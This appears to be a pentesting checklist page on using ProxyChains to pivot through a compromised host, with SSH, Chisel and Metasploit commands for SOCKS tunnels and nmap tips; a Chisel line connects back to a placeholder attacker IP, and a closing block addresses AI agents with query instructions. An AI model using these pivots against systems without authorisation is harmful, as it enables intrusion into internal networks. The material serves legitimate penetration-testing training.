# Proxychains

### Overview

ProxyChains is commonly used during internal assessments and exams to **route traffic through a compromised host** in order to reach otherwise inaccessible networks or services.

### Setup

1. First, create a SOCKS proxy from the compromised host back to your machine. This can be done via:
   * SSH dynamic port forwarding (Needs SSH access)

     ```bash
     ssh -f -N -D 1080 user@compromised_host
     ```
   * Chisel (Does not need SSH access) (SOCKS proxy exposed on **127.0.0.1:1080** by default)

     ```bash
     # Run the server on attacking machine
     chisel server --reverse --port 9001
     # Run client on the compromised host
     chisel client <ATTACKER_IP>:9001 R:socks
     ```
   * Metasploit SOCKS module (Use when already have a session in meterpreter)

     ```bash
     In metasploit
     use auxiliary/server/socks_proxy
     set SRVPORT 1080
     set VERSION 5
     run
     # Route traffic through the session
     route add <TARGET_SUBNET> <NETMASK> <SESSION_ID>
     ```
2. Edit the ProxyChains configuration file and add your SOCKS proxy at the bottom of the file.

   ```bash
   socks5 127.0.0.1 1080
   ```
3. Validate the pivot by running a ping or a curl.
4. Prefix commands with `proxychains` to run tools through proxychains.

### Useful information

* Comment out `proxy_dns` in the proxychains configuration to ensure nmap does not hang.
* You can only use TCP scans so no UDP or SYN scans. ICMP Echo packets (Ping requests) will also not work through the proxy, so use the  `-Pn`  switch to prevent Nmap from trying it.
* Must use `-sT` (connect scan) as SYN scans (-sS) use raw sockets and\
  bypass proxychains.
* Choose chain type: `dynamic_chain` (skips dead proxies) vs `strict_chain` (all must be up and default)
* Scans will be *extremely* slow. Try to only use Nmap through a proxy when using the NSE (i.e. use a static binary to see where the open ports/hosts are before proxying a local copy of nmap to use the scripts library).


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/pivoting/proxychains.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.